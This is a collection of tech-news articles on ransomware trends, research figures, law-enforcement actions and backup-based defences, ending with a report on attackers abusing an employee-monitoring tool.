The global cyber threat landscape is undergoing a radical transformation, moving away from monolithic ransomware cartels toward highly volatile, fragmented splinter groups, a top UK police official has warned.

Speaking at Infosecurity Europe 2026, William Lyne, Head of Economic and Cybercrime at the Metropolitan Police Service, told IT and security leaders that the modern cyber crime ecosystem has evolved into a highly accessible space.

Lyne compared the underground landscape to a bar where threat actors can "get everything but a good drink."

"It felt like cyber threats were all quite stovepiped. You had hacktivists, you had hostile state actors," Lyne explained, reflecting on his early career. Today, however, those lines have blurred. "Those kind of stovepipes... no longer really exist."

Instead, Lyne described a blended ecosystem of products, goods, and services that has dramatically lowered the barrier to entry for prospective criminals.

This shift has been heavily accelerated by cryptocurrencies, which solved the traditional criminal bottleneck of "cashing out."

Previously, threat actors lost up to 75% of their profits navigating complex, expensive money-mule networks. Today, cryptocurrency allows them to realize illicit gains almost instantly and with very little risk.

Fragmentation and the 'post-trust' era

While massive international law enforcement operations have successfully dismantled groups like LockBit and disrupted phishing as a service (PhaaS) platforms, Lyne cautioned that the criminal underground is rapidly adapting.

"It's getting more diverse... [and] also much more fragmented," Lyne said. Following high-profile law enforcement crackdowns, cybercriminals have realized that operating as a massive, centralized brand or ransomware as a service scheme is "actually quite bad for business."

As a result, major ransomware operators are breaking off into smaller, independent factions.

This fragmentation is leading to a dangerous "post-trust" trend within the criminal ecosystem. Without the strict moderation and internal rules previously enforced by large cartel administrators, smaller threat actors are exhibiting more extreme, aggressive, and unpredictable behaviors.

The demographics of these attackers are also shifting. Lyne noted that the threat landscape is moving beyond traditional Russian-speaking hubs to include actors from Brazil, Türkiye, and English-speaking groups like the notorious Scattered Spider collective.

AI weaponizing hoarded data

Addressing the inevitable topic of AI, Lyne dispelled fears of autonomous systems launching end-to-end cyber attacks, but highlighted a pressing new risk for enterprise data privacy.

"These guys are generally not innovative," Lyne noted, explaining they only change their methods if they are “systematically earning less money... or they spy an opportunity to make more money."

Having stolen and hoarded petabytes of corporate data over the last decade, data that was rarely deleted even when victims paid the ransom, cyber criminals are now using AI tools to operationalize these massive "treasure troves" and mining historic datasets for new extortion and revenue streams.

Rewriting the law enforcement playbook

Faced with this agile, commoditized threat, the Met Police and its international partners are adopting aggressive new disruptive strategies.

"We can't arrest our way out of this problem," Lyne admitted, citing the jurisdictional complexities of cross-border cybercrime.

Instead, policing has shifted toward systemic disruption, psychological operations designed to undermine criminal trust, and targeting the foundational infrastructure of the cybercrime supply chain.

Crucially, this requires unprecedented collaboration with the private sector. Lyne emphasized that the Met Police is increasingly sharing intelligence with enterprise IT security teams and even naming industry partners who assist in operations on their site takedown pages.

"Ultimately, like, lots of these things just come down to trust," Lyne concluded, addressing the security professionals in the room.

"We want to have meaningful, both strategic and tactical collaboration with industry partners that we know hold some of the keys to... the challenges that we have in this space. The cultural change that we have undertaken, I think will continue so that we collaborate better moving forward."

FOLLOW US ON SOCIAL MEDIA

Ransomware is still a booming business, according to new research from Rapid7 Labs. So much so that cyber criminal gangs are outperforming major companies.

Analysis from the cybersecurity firm found ransomware groups made an estimated $529.2 million in the first quarter of this year, with total revenues up by 39% year-on-year.

That's a better performance than FTSE 350 companies have managed in the same period, not one of which showed year-on-year revenue growth of over 30% during the quarter.

A number of major cyber crime outfits are profiting from the boom, and it’s been a particularly good year for the Qilin ransomware group. Rapid7 researchers noted the group made an estimated $193 million between July 2025 and March 2026.

The Gentleman group, meanwhile, made an estimated $52 million over the same period.

“Ransomware groups are not the isolated, hooded hacking crews in dark rooms," said Thom Langford, CTO EMEA at Rapid7. "Instead, many resemble highly efficient businesses generating revenue growth that would make legitimate organizations envious.”

Booming ransomware revenues

One reason for the booming revenues is the rise of initial access brokers, which has lowered the barriers to entry by shifting cyber crime from technically specialized malware development to a mature underground marketplace.

Access, tooling, and full attack services are now commercially available to almost anyone. Modern cyber crime operations involve distributed networks of specialists handling initial access, malware and ransom negotiations, and working like legitimate supply chains.

Servers, leak sites, and negotiation portals can be quickly rebuilt after disruption, while law enforcement takedowns take longer to coordinate and execute.

“The problem is they are demonstrating, very publicly, that ransomware can be a successful criminal enterprise, and ironically, in some ways, they’re more resilient than businesses themselves,” said Langford.

“Removing one group, one server, or one piece of infrastructure rarely collapses the wider operation because the ecosystem is designed to keep functioning around the damage."

Battling continued ransomware threats

Rapid7 said organizations should prioritize identifying and reducing exposed attack surfaces on a continuous basis, focusing on misconfigurations, isolated assets, and internet-facing vulnerabilities.

These are all commonly exploited in initial access brokerage markets, the study noted.

Elsewhere, security teams should leverage threat intelligence more proactively to map adversary behavior patterns, infrastructure, tooling, and access pathways.

Notably, researchers said defenses should shift toward preventing credential and access compromise at source. This includes implementation of stronger identity controls, enforcement of least privilege rules, and monitoring for early indicators of credential resale or misuse in underground ecosystems.

“To give ransomware groups the economic crash they deserve, we need to shift to earlier visibility and earlier action," said Langford.

"That means businesses understanding exposure, reducing attack surface, tightening identity controls, and using threat intelligence to intervene earlier in the chain before ransomware becomes an outcome rather than a possibility.”

FOLLOW US ON SOCIAL MEDIA

A new threat group, The Gentlemen, has become one of the most active ransomware operators, accounting for 10% of all attacks and second only to the notorious Qilin.

Despite only having emerged in July last year, The Gentlemen has quickly evolved into a highly operational RaaS group, according to the NTT, using advanced tooling and proxy infrastructure to accelerate attacks and improve stealth.

With a level of technical maturity that would normally be associated with more established ransomware groups, the researchers believe that the group consists of experienced actors with potential ties to other ransomware ecosystems.

The group's targeting remains focused on industrial organizations, the information technology sector, and some consumer spaces, with notable victims including Synergy France, UK Electronics, and Equity Life.

In terms of target geography, meanwhile, The Gentlemen largely extorts organizations in Europe, with the UK and Germany among the most heavily targeted countries.

Its affiliates are increasingly leveraging SystemBC malware, a proxy and backdoor tool often used in human-operated ransomware attacks, to establish covert tunnelling, evade detection, and support rapid lateral movement across enterprise environments.

The group's rapid growth so far this year, combined with its sophisticated proxy infrastructure and obfuscation techniques, means organizations should expect faster intrusion cycles and reduced dwell times before encryption deployment, NTT said.

"The rise of groups like The Gentlemen demonstrates how affiliates are now combining shared tooling, stealth infrastructure, and repeatable intrusion methods to accelerate attacks at scale," said Matt Hull, VP of cyber intelligence and response at NCC Group.

"Techniques such as covert tunnelling and rapid domain-wide deployment are shrinking the window that defenders have to detect and respond before encryption occurs."

According to NTT, there were 748 ransomware listings worldwide during April, representing a 7% fall from the figure for March. However, ransomware activity in 2026 has been operating at a higher baseline than much of 2025, as the ransomware-as-a-service (RaaS) ecosystem expands and matures.

Claude Mythos – the large language model reportedly capable of autonomously identifying vulnerabilities and developing exploit chains – has yet to make its mark, thanks to restricted access, controlled testing environments, and questions around operational effectiveness at scale.

"Developments around AI models such as Claude Mythos suggest AI-assisted vulnerability discovery and exploitation could further compress attacker timelines in the future," said Hull. "However, the industry should remain cautious about overstating current capabilities, particularly where testing has been limited to controlled environments."

The report also highlighted several geopolitical developments likely to influence cyber activity in the coming months, including China's expanded supply chain security regulations, which consolidate and extend existing controls on import and export activities.

Meanwhile, the strategic significance of NASA's Artemis program is motivating China and other nations to carry out espionage, IP theft activities, and potentially even destructive attacks.

"Numerous other well-resourced countries (and private companies) are pursuing high-stakes interests dependent on the domain of space; including but not exclusive to India, Japan, Israel, South Korea, UAE, Russia, Iran, and North Korea," the researchers warned. "Defenders should avoid being too narrow in their assessments of potential threats."

Experts have warned about the risks of paying ransoms after Instructure bowed to cyber criminal demands to avoid having stolen data published online.

The move comes after Canvas, a popular academic learning platform developed by Instructure, was breached by the ShinyHunters threat group last week.

More than 9,000 academic institutions across the US, UK, Canada, and Australia were impacted by the breach, which saw roughly 3.5 terabytes of data stolen by the ransomware group.

The move by Instructure marks the latest in a string of examples where organizations have chosen to play ball with hackers in the wake of a ransomware attack.

It’s a contentious topic for many in the security industry, and a tactic that is surprisingly common. Research from Absolute Security, published today, shows that more than half (57%) of CISOs would consider bowing to hacker demands to end a ransomware attack.

A key factor behind paying up, the study noted, lies in shortening potential downtime due to ransomware attacks. Nearly half (46%) ranked operational downtime as the most significant aspect of an attack.

To pay, or not to pay

The question of whether to pay up or not is a catch-22 for enterprises. Jeff Watkins of Leeds-based consultancy, NorthStar Intelligence, told ITPro that paying may appear to make sense for many given the potentially disastrous effects of data leaks.

“Paying cyber criminals may seem like a rational choice to avoid future data leaks, and in ransomware cases, where restoring from backups is not simple/feasible, it is often seen as necessary for business continuity,” he said.

Watkins pointed to the British Library attack in late 2023, which saw the institution refuse to pay a ransom. Hackers behind the attack subsequently released 500,000 files and recovery took several months – and at great cost.

Put simply, paying up often represents a small financial hit compared to the broader costs associated with recovery. Research last year, for example, found the average recovery cost for ransomware victims stood at $4.5 million.

But this tactic rests on trusting that the cyber criminals in question honor their side of the bargain, according to Watkins.

“There are risks involved in paying up, though,” he told ITPro. “There is that old adage, ‘there’s no honor amongst thieves’, and there is a risk that you simply lose your money, or they come back for more before deleting the data, providing a decryptor, or suppressing publication."

The Change Healthcare attack is a prime example of the risks involved with paying up, Watkins noted. The healthcare firm paid a $22 million ransom to the ALPHV/BlackCat group after a devastating 2024 attack, and they simply made off with the money.

RansomHub, an affiliate of ALPHV/BlackCat, still held data stolen in the breach and re-extorted the company.

Legal and moral ramifications

In addition to the operational considerations at play for enterprises, there are legal and moral ramifications.

The UK’s National Cyber Security Centre (NCSC) has been vocal in advising victims against paying up, while the US Cybersecurity and Infrastructure Security Agency (CISA) takes a similar stance.

In 2025, the UK government unveiled proposals aimed at banning ransom payments by public sector and critical national infrastructure (CNI) operators.

At the time, the government said the ban would “target the business model that fuels cyber criminals’ activities”.

Gary Barlet, public sector CTO at Illumio, said paying a ransom is often viewed as an “incentive for bad behavior” and simply places a bigger target on the back of those already affected by an attack.

“Cybersecurity professionals caution against this, because it signals to other threat actors that an organization is willing to pay if they can manage to steal data,” he told ITPro.

“Professionals worry that threat actors will then attempt to gain access to the same systems and demand even more in payments.”

Watkins echoed Barlet’s comments on threat actor incentivization, adding that choosing to pay effectively funds organized crime.

“This isn’t intended to be a criticism of the victims, as organizations pay because the choices are often ugly, not because they trust the criminals,” he said.

“They often face operational paralysis, patient/student/client harm, contractual penalties, regulatory exposure, reputational damage, and recovery costs far exceeding the ransom demand,” Watkins added.

“However, for as long as we allow organizations to pay ransom, the problems will escalate.”

Light on the horizon

There are positive signs that enterprise policies on ransomware attacks are changing, with many now refusing to play ball. As ITPro reported in August last year, research from Databarracks found just 17% of UK businesses paid ransoms in the wake of a breach.

This marked a steep decline compared to the year prior, in which more than a quarter (27%) opted to pay to recover stolen data. In 2023, nearly half (47%) chose to pay.

Enterprise backup strategies have helped on this front, the study noted, with victims choosing to recover instead of paying. More than half (57%) recovered data through backups after an attack across 2025.

Notably, Databarracks found enterprises are now three-times more likely to recover from backups than paying hackers, highlighting an increasingly tough approach.

FOLLOW US ON SOCIAL MEDIA

A Latvian man has been sentenced to eight and a half years in prison in the US for his role as a negotiator in one of the world's most notorious ransomware groups.

Deniss Zolotarjovs, 35, was a member of a ransomware gang led by former leaders of the Conti ransomware group, and variously known as Conti, Karakurt, Royal, TommyLeaks, SchoolBoys Ransomware, and Akira, among others.

Zolotarjovs was arrested in Georgia in December 2023 and transferred into US custody in August 2024. He pleaded guilty in July 2025 to conspiring to commit both money laundering and wire fraud.

“Cyber criminals might think they are invulnerable by hiding behind anonymizing tools and complex cryptocurrency patterns while they attack American victims from non-extradition countries,” said US attorney Dominick S. Gerace II for the Southern District of Ohio.

"But Zolotarjovs’s prosecution shows that federal law enforcement also has a global reach, and we will hold accountable bad actors like Zolotarjovs, who will now spend significant time in prison.”

Devastating ransomware disruption

Between June 2021 and August 2023, the group stole data from more than 54 companies in the US and around the world.

Of these, attacks on just 13 of those companies resulted in more than $56 million in losses, including approximately $2.8 million in ransom payments.

Extrapolating from the known victims and known losses, the government said it estimates the total losses for the period to likely be in the hundreds of millions of dollars.

Zolotarjovs' main role was to pile the pressure on victims who failed to pay up quickly enough. He analyzed stolen data, researched victim companies, and exploited his access to particularly sensitive and extremely personal information.

In one attack on a pediatric healthcare company, Zolotarjovs deliberately leveraged children’s health information for extortion – and when he failed to extract a ransom, he urged his co-conspirators to leak or sell their medical data.

The group was mostly Russian or Russia-based, and operated for a time out of an office building in St. Petersburg. It had a hierarchical management structure, with work split into separate teams using a network of companies registered throughout Russia, Europe, and the US to obfuscate its operations.

Members included multiple former Russian law enforcement officers, allowing the group to co-opt Russian government databases and law enforcement connections to intimidate and harass personal detractors, and to identify and evaluate potential new recruits.

It also made for special treatment for members of the organization, with the leaders avoiding Russian taxes and compulsory military service.

“Deniss Zolotarjovs helped his ransomware gang profit from hacks of dozens of companies, and even on a government entity whose 911 system was forced offline. He also used stolen children’s health information to increase his leverage to extort victim payments,” said assistant attorney general A. Tysen Duva of the Justice Department’s Criminal Division.

"The Criminal Division will continue to investigate and prosecute international hackers and extortionists from around the world, no matter where they live or operate."

FOLLOW US ON SOCIAL MEDIA

Cyber criminals are shifting away from high-volume “spray and pray” threat campaigns toward more targeted attacks to “maximize impact against fewer victims”.

That’s according to new research from SonicWall, which recorded a 20% increase in the number of compromised organizations across the UK last year, even as broader ransomware volumes fell by 87%.

SonicWall noted that smaller businesses are among those most likely to be targeted in “big game hunting” ransomware campaigns. Figures published by the firm show ransomware was used in 88% of SMB breaches, for example.

That marks a stark contrast to larger enterprises, in which just 39% of cases involved ransomware.

“The UK data for 2025 highlights ransomware is evolving into Big Game Hunting,” said Spencer Starkey, executive VP for EMEA at SonicWall.

“On the surface, the 87% drop in overall attack volume might look like progress, but the reality is more alarming. More organisations are being successfully hit, and attackers are doing it with far greater precision."

Targeting “zombie tech”

SonicWall noted that threat actors are prioritizing attacks on organizations with less mature security environments, but also those operating on outdated infrastructure, or “zombie tech”.

Researchers highlighted a single decade-old vulnerability in Hikvision IP cameras accounted for 67 million attempted cyber attacks in the UK alone last year, representing 20% of all intrusion activities observed by the firm.

This single case underlines the risks posed to enterprises by vulnerabilities flying under the radar, according to SonicWall – and it comes at a time when flaws are being exploited at an even quicker pace.

Around 80% of IT leaders said they believe their organisation can detect a breach within eight hours, yet SonicWall findings show attackers can remain undetected for an average of around 181 days.

Automated threats are also growing, posing even bigger challenges for security teams. AI-enabled attacks increased by 89% in 2025, researchers noted, and bots are now generating 36,000 scans per second, scouring the web for potential vulnerabilities.

“Zombie Tech continues to haunt UK networks. We’re seeing millions of attacks tied to a single long-known vulnerability, alongside continued exploitation of issues first disclosed more than a decade ago,” Starkey said.

“Threats are becoming more sophisticated at the top end, while remaining highly exploitable at the base and organizations must address both.”

FOLLOW US ON SOCIAL MEDIA

Organizations are massively overestimating their ability to recover from a ransomware attack, with most failing to recover all their data.

According to Veeam's Data Trust and Resilience Report 2026, while nine-in-ten security leaders believe they can recover quickly, only 28% manage to fully restore their data.

On average, organizations recovered just 72% of affected data following a ransomware attack, while another 29% have ended up with data loss, downtime, or business disruption.

For cyber incidents generally, amongst organizations that fell victim in the past 12 months, more than 40% reported customer or constituent disruption. Around the same number reported financial loss or revenue impact, and 38% reported extended downtime of critical systems.

The researchers suggest that confidence in recovery is often boosted by the use of testing and planning – but that the frequency and realism of those tests are limited by operational and business pressures.

"Confidence in recovery from a ransomware attack is high, but the data tells a different story – and AI is only widening that gap," said Anand Eswaran, CEO of Veeam. "Even the most sophisticated organizations are discovering that confidence in recovery and proof of recovery are fundamentally different capabilities."

AI is only making things worse, thanks to new data flows, new attack surfaces, and new governance challenges. More than four-in-ten (43%) of respondents said AI tool adoption was outpacing their ability to secure data and models, and 42% have limited visibility into all the AI tools or models used across the organization, with a quarter saying shadow IT and unauthorized AI tool usage are a primary concern.

Four-in-ten said their security policies haven't yet been updated to include AI-specific risks, such as the use of generative AI.

The organizations that are doing well in terms of recovery, said Veeam, are those that have clear visibility into enterprise data and AI risk in production and in backup data, along with realistic testing and validation.

They also actually enforce security controls, rather than relying on policy alone, and have executive alignment on ownership, reporting, and what recovery actually means.

"Data resilience is still the hard requirement: knowing what data you have, where it lives, who can access it, and proving you can restore clean, trusted data fast when attackers – or operational failures – put the business under pressure," said Eswaran.

"The infrastructure for deploying AI has rapidly outpaced the ability to secure it. Organizations need end-to-end capabilities to understand, secure, protect, govern, and ensure their data is resilient at machine speed."

Last summer, Check Point's 2025 Cloud Security Report revealed that while nearly two-thirds of organizations suffered a cloud security incident in the past year, only 6% of incidents were remediated within the first hour, with 62% of enterprises taking more than 24 hours to fully recover.

Meanwhile, research from cybersecurity firm ESET found that 53% of UK businesses had fallen victim to at least one cyber attack over the last year, with 43% saying that this had had a long-term impact on business growth.

Costs included the extra staff time needed to deal with an attack, cited by nearly two-thirds of businesses, with others including ransom payments, stolen or lost funds, legal and regulatory costs, disruption to operations, and the cost of bringing in third-party expertise along with higher cyber insurance premiums.

German police have identified two Russian hackers and are calling for help tracking them down.

The German Federal Criminal Police (BKA) said that 31-year-old Daniil Maksimovich Shchukin, who went by the handle 'UNKN', was behind the Russian ransomware groups GandCrab and REvil.

He is suspected of having carried out 130 incidents of gang-related extortion against German organizations, along with 43-year-old Anatoly Sergeevitsch Kravchuk, a Ukraine-born Russian citizen.

Kravchuk is accused of creating and further developing the dark web site used by the group to organize and manage extortion, as well as development of the malware itself.

Across 25 of the cases, the BKA said a total of €35.4 million was paid out in ransom payments.

"Based on investigations conducted so far, the wanted person is believed to be currently abroad, presumably in Russia. It is impossible to rule out potential travel," the BKA said.

"The police are interested in receiving a response to the following question: can you provide any information on the wanted person's current whereabouts?"

REvil mastermind

From the beginning of 2019 until at least July 2021, Shchukin acted as the head of one of the largest ransomware groups globally, known as GandCrab or, later, REvil.

"For the decryption and non-publication of data, the perpetrators demanded high ransoms," said the BKA. "In addition, in some cases, extensive data were also spied on and threatened with the publication of this, unless a ransom was paid."

GandCrab operated a ransomware as a service (RaaS) model, primarily through the use of spam emails. It's believed to have netted a total of more than $2 billion from ransomware attacks, before evolving into REvil, also known as Sodinokibi, in 2019.

“We are a living proof that you can do evil and get off scot-free,” GandCrab said as it bowed out. “We have proved that one can make a lifetime of money in one year. We have proved that you can become number one by general admission, not in your own conceit.”

The group claimed to have been making $2.5 million per week.

"We personally earned more than 150 million dollars per year," Shchukin claimed. "We successfully cashed in this money and legalized it in various spheres of white business both in real life and on the internet."

In its next incarnation as REvil, the group targeted large organizations including IT management software firm Kaseya in a 2021 supply chain attack that saw as many as 1,500 organizations compromised.

Law enforcement agencies including the FBI were eventually able to infiltrate the group’s infrastructure and get hold of its decryption keys, which were then distributed to victims.

The US Justice Department also seized cryptocurrency worth more than $317,000 linked to wallets allegedly controlled by Shchukin.

FOLLOW US ON SOCIAL MEDIA

Ransomware is a widespread problem that’s plagued businesses for years, with particularly damaging financial and operational consequences. Attackers continually develop new strains of ransomware, for new ways to bypass cybersecurity defenses and user vigilance.

In recent months, cybersecurity analysts have confirmed that attackers are disguising ransomware as file types for the industry standard computer-aided design (CAD) software AutoCAD, which is produced by Autodesk.

Veeam’s cybersecurity teams recently identified ransomware using AutoCAD file types. It’s just the latest ransomware danger that businesses have to watch out for, as the threat landscape expands and becomes more complicated.

Ransomware typically operates by tricking users into running a script, which downloads malware into their system and then executes the code. The malware will then encrypt all files on the system and demand a ransom is paid to release the key to decrypt the files. The attackers may also threaten to release sensitive information. Ransomware has proved so successful that some hacking groups are offering malware as a service.

Ransomware disguised as AutoCAD

According to the revenue intelligence platform 6Sense, it has been estimated that AutoCAD has a nearly 40% of the market share of CAD software. Given its ubiquitous nature in a wide variety of disciplines, including engineering and architecture, many of the larger engineering firms will often have thousands of AutoCAD packages installed throughout their network.

“It was in 2023 that ransomwares started reusing AutoCAD file extensions, and that makes it really confusing when you have a file extension of something that you know is okay, and then it's also associated with a threat actor,” says Rick Vanover, vice president of product strategy at Veeam.

“That puts detection tools in the middle, because you can't just look at names, you have to then look at content. Organizations have to balance a broad air cover of detection versus a detailed confirmation.”

It is difficult to know for certain if using an AutoCAD file type was deliberate or not (unless those responsible come forward) but using the same file type as a widely deployed engineering package would be a logical way to overcome basic malware checks. While CAD users may well know to be suspicious of, for example, executable files, they are likely to be more trusting of AutoCAD files.

Organizations that use AutoCAD – and AutoDesk products – need to be vigilant. There may be a temptation to allow exceptions relating to this software, but that would leave the system exposed to ransomware attacks using the AutoCAD file types.

As malware has proliferated, cybersecurity developers have created tools to detect it. These tools are constantly iterating and evolving their defences, as they are updated with new versions of ransomware that are detected.

Other than informing users of ransomware disguising itself as an AutoCAD file, there seems very little that AutoDesk could do.

The cost of ransomware attacks

Ransomware attacks are incredibly damaging to organisations. Rebuilding from scratch is costly and time-consuming. There are additional costs of downtime and reputational damage, both from unscheduled suspension of services and the potential for data leaks. The UK’s National Cyber Security Centre (NCSC) has advised against paying a ransom.

Some organizations choose to pay the ransom, but there are additional risks with trusting criminals. Furthermore, the victim will have revealed that they are willing to pay ransoms and will therefore increase their chances of being targeted again in the future.

“I honestly would not trust a cleaning of a file. Would you really trust that data after it's been touched twice by the threat actor?” asks Vanover. “I'm not much of a fire extinguisher, guy. I'm much more of a rebuild the building type, in a data way.”

If organizations choose to rebuild after a ransomware attack, they can be confident their data has not been compromised by any malicious actors, leaving a metaphorical time bomb in their system.

Preparations can be undertaken to mitigate the time and resources spent in restoring systems by utilizing a robust backup policy that incorporates multiple restore points in various locations, as well as redundancy systems that can be activated when necessary. Although such measures naturally require time and resources to be properly deployed, they will mitigate the much larger costs of rebuilding, as well as minimising the associated reputational harm.

The future of ransomware

Ransomware will continue to proliferate, especially as it is so lucrative for organized crime groups. If we assume that the utilization of AutoCAD file types is deliberate, then we should also expect hackers to adopt other popular industry standard software file types, to avoid detection.

A consequence of the constant cybersecurity arms race is that there is now a colossal catalogue of malware that needs to be tracked and guarded against. Furthermore, as malware detection tools have become increasingly sensitive to potential attacks, more detections will be made, thus increasing the number of false positives.

The growing number of false positives could potentially overwhelm administrators and thereby inadvertently allow mistakes to happen, due to there being too much information for them to properly process.

AI solutions may be beneficial here, as an AI tool can quickly sift through a large number of notifications, to prioritise those that require the administrator’s attention.

Unfortunately, the lucrative nature of ransomware means that it is here to stay. We will continue to see new versions being developed, and we will likely see more that mimic previously trusted file types. It is therefore essential for enterprises to have malware detection systems in place, alongside up-to-date user training, a robust backup system, sandbox testing, system restore policies and failover measures.

“Data sovereignty is more important than ever. Organisations need to ensure that they have their data and the control of it, says Vanover.

AutoDesk were approached for comment, but did not respond at time of publication.

While much emphasis has been placed on the rise of youth cyber crime over the last two years, new research shows hacker activity peaks much later.

Orange Cyberdefense looked at the numbers and found that it's actually thirty- and forty-somethings that are the greatest threat.

The company’s intelligence team analyzed 418 publicly announced law enforcement activities between 2021 and mid-2025 and found that offenders’ activities peaked between the ages of 35 and 44. This age group, they said, accounted for 37% of cyber crime cases.

Put together, the combined age groups of 25-to-44 make up well over half (58%) of analyzed cyber crime cases.

Only one-in-five (21%) incidents were the work of 18-to-24-year-olds. Despite the bad press they get in movies and the news, 12-to-17s were behind fewer than 5% of cases.

“The surge in cyber offences committed by teenagers in recent years may be creating a false impression of the age of today's cyber criminals," said Charl van der Walt, head of security research at Orange Cyberdefense.

"The sensationalist interpretation of cyber crime's youthfulness makes for a good headline, but these findings appear to tell a different story."

Differing motives

One big difference between the kids and their elders is the underlying motivation behind attacks, researchers noted. As you might expect, younger hackers are frequently experimenting while the older cohort is in it primarily for financial gain.

Among 18-24-year-olds, cyber criminal activity is highly diverse, though there's a focus on hacking (30%) in particular, followed by selling stolen data and DDoS attacks (10% each).

Things start to change among offenders aged between 25 and 34, who tend to focus on more profitable activities such as selling stolen data (21%), cyber extortion (14%) and malware deployment (12%).

This trend continues among 35-to-44 year olds, where cyber extortion (22%) is the crime of choice, followed by malware (19%) and cyber espionage (13%), hacking (10%), and money laundering (7%).

"While younger, less experienced hackers engage in highly diverse – and often noticed and reported – actions, they may be less likely to engage in calculated, profit seeking activity," said van der Walt.

"Instead, cyber crime careers appear to peak much later into adulthood, accompanied by vastly more sophisticated and intentional techniques.”

Some of those teen-related activities are very high profile indeed. Late last year, for example, a 15-year-old was outed by security researcher Brian Krebs as a member of Scattered LAPSUS$ Hunters – the group responsible for the Jaguar Land Rover (JLR) and M&S cyber attacks.

Two teenagers, meanwhile, are set to face charges for the 2024 hack of Transport for London (TfL), while another pair have been arrested for the data breach of the Kido chain of children's nurseries.

FOLLOW US ON SOCIAL MEDIA

Ransomware is accelerating at an alarming pace. Europe is headed toward its worst year yet for ransomware incidents, up about 80% in 2024, with 2025 already breaking previous records. 

Downtime caused by these attacks, not just the ransom, is one of the most damaging outcomes. For many mid-market organizations, losing access to critical systems for days or weeks can mean disastrous financial, operational, and reputational damage. This also causes a strong impact on IT staff mental health, where 84% of IT professionals feel uncomfortably stressed at work amid rising cybersecurity threats.

Immutable backup storage is one of the most effective defenses. Once data is written, it can’t be altered or deleted, meaning it’s always available for recovery after an attack. However, enterprise-grade backup storage has sometimes been seen as out of reach for small and medium-sized organizations, with unnecessarily high entry points in terms of capacity and capital expenditure.

Now, that’s changing. Consumption-based subscription models are breaking down these barriers by bringing enterprise-level protection to a much wider range of businesses. By offering predictable monthly billing, these models are levelling the playing field, and for channel partners, they’re also creating new recurring-revenue opportunities.

Ransomware protection for all

Ransomware is no longer a problem that only hits large enterprises. With Ransomware-as-a-service platforms, attackers can automate campaigns and scale their reach across businesses of every size. Mid-market firms, often seen as ‘too small’ to attract sophisticated attacks, are increasingly in cyber criminals’ crosshairs because they may have fewer protections in place.

This shift puts the channel in a pivotal position. Managed service providers (MSPs), value-added resellers (VARs), and system integrators (SIs) can now deliver enterprise-grade ransomware protection to clients of any size through consumption-based models.

Instead of large capital outlays, partners can help customers deploy immutable backup solutions on a predictable, subscription basis, reducing friction and speeding up adoption.

It's not just about affordability. This model fosters long-term recurring revenue and deeper customer relationships built on ongoing protection rather than one-off sales. In an era where trust and resilience are critical, that combination of commercial and security value is compelling.

Backup as the new frontline

The modern approach to ransomware must start with the assumption that a breach will inevitably happen. Preventative tools remain crucial, but downtime from attacks, even when ransoms aren’t paid, can be devastating.

Immutable backups shift the focus from reactive recovery to proactive assurance. By ensuring data cannot be encrypted, deleted, or modified once written, businesses can be confident they have a reliable way to recover after an attack. That confidence is invaluable for IT teams facing today’s constant threat pressure.

For the channel, it’s also an opportunity to evolve conversations from “prevention” to resilience. Partners can help customers build recovery strategies that meet compliance and insurance requirements, while delivering managed backup and recovery services that generate recurring revenue. Immutability, once a niche enterprise feature, is fast becoming a core managed service differentiator.

Immutability for the mid-market

Smaller firms face a unique challenge; just like larger enterprises, they handle sensitive data, but often lack the resources to secure it to the same standard. Attackers are aware of this and increasingly target mid-market organizations because they often represent ‘low-hanging fruit’.

Consumption-based subscription models help partners close that gap. They can offer mid-market customers enterprise-grade immutability and recovery to remove any budget hurdles that originally slowed down adoption.

For MSPs and VARs, this flexibility creates tangible business advantages. They can scale protection alongside their customers’ growth, adjust resources, and bundle ransomware protection into broader management. The result is therefore a sustainable service model where customers gain accessibility and partners gain reliability in revenue.

Insurance-ready backups

Cyber-insurance requirements are tightening, which means insurers increasingly demand verifiable, immutable backups and tested Recovery Time Objectives (RTOs) as conditions for coverage. Firms that cannot demonstrate these capabilities may face higher premiums or denied claims.

Immutable backup solutions simplify this process and position partners to help customers meet insurer expectations. By offering managed immutable backup and recovery services, MSPs can support compliance reporting while delivering faster recovery and strengthening clients’ security.

This builds trust with customers and insurers, enhancing both protection and revenue for the channel.

A model built for resilience

Today, ransomware does not discriminate. Every organization and every partner serving them faces the same pressure to recover quickly. In the fight against ransomware, no partner or customer stands alone. Resilience grows from collaboration, a connected ecosystem where vendors, MSPs, and customers all play their part.

Consumption-based immutability makes resilience achievable for all. It allows partners to deliver enterprise-grade backup protection to any customer, regardless of size, while building steady revenue streams. Predictable billing supports long-term customer relationships and margin planning, turning security into a shared business goal between provider and client.

As ransomware threats continue to rise, recovery readiness will define resilience, not just prevention alone. Immutable backups delivered through flexible, subscription-based models ensure that every organization can restore operations swiftly whilst protecting reputation and maintaining trust. For the channel, that’s not just a service opportunity; it’s also a chance to lead in shaping the next era of cyber resilience.

Hackers are targeting a popular workforce monitoring tool and using it as a basis for ransomware attacks.

Net Monitor for Employees Professional is a staff productivity tracking tool from NetworkLookout, with features including reverse shell connections, remote desktop control, file management, and the ability to customize service and process names during installation.

In late January and early February, Huntress said its Tactical Response team spotted two separate intrusions in which threat actors chained Net Monitor with SimpleHelp in attempted ransomware attacks.

SimpleHelp is a legitimate remote monitoring and management (RMM) platform widely used by IT teams and managed service providers.

"Shared infrastructure, overlapping IOCs, and consistent tradecraft across both cases strongly suggest a single threat actor or group behind this activity," researchers said.

The threat actors used Net Monitor for Employees as a primary remote access channel, with SimpleHelp used as a redundant persistence layer. This allowed them to blend in with normal traffic, ultimately leading to the attempted – but on these occasions unsuccessful – deployment of Crazy ransomware.

"Threat actors leveraged this capability for hands-on-keyboard reconnaissance, additional tooling delivery, and deploying secondary remote access channels, effectively turning an employee monitoring tool into a fully functional RAT (remote access trojan)," said the team.

In the first case, it's not clear how the attackers gained initial access, but they went on to start trawling around user accounts and attempting to change passwords and create new user accounts. Huntress spotted Net Monitor for Employees' terminal pulling down a file via PowerShell that turned out to be SimpleHelp.

Luckily, attempts to tamper with Windows Defender and deploy multiple versions of Crazy ransomware failed.

In the second case, a threat actor leveraged a compromised vendor's SSL VPN account to gain initial access, then launching an interactive PowerShell session to begin staging their tooling.

They installed SimpleHelp and configured it to monitor for certain keywords.

"Interestingly enough, the SimpleHelp agent was also configured with keyword-based monitoring triggers via GlobalEvents, revealing the threat actor's financial motivation," said the team.

These included wallet services (metamask, exodus, wallet, blockchain), exchanges (binance, bybit, kucoin, bitrue, poloniex, bc.game, noones), blockchain explorers (etherscan, bscscan), and the payment platform payoneer.

How enterprises can shore up defenses

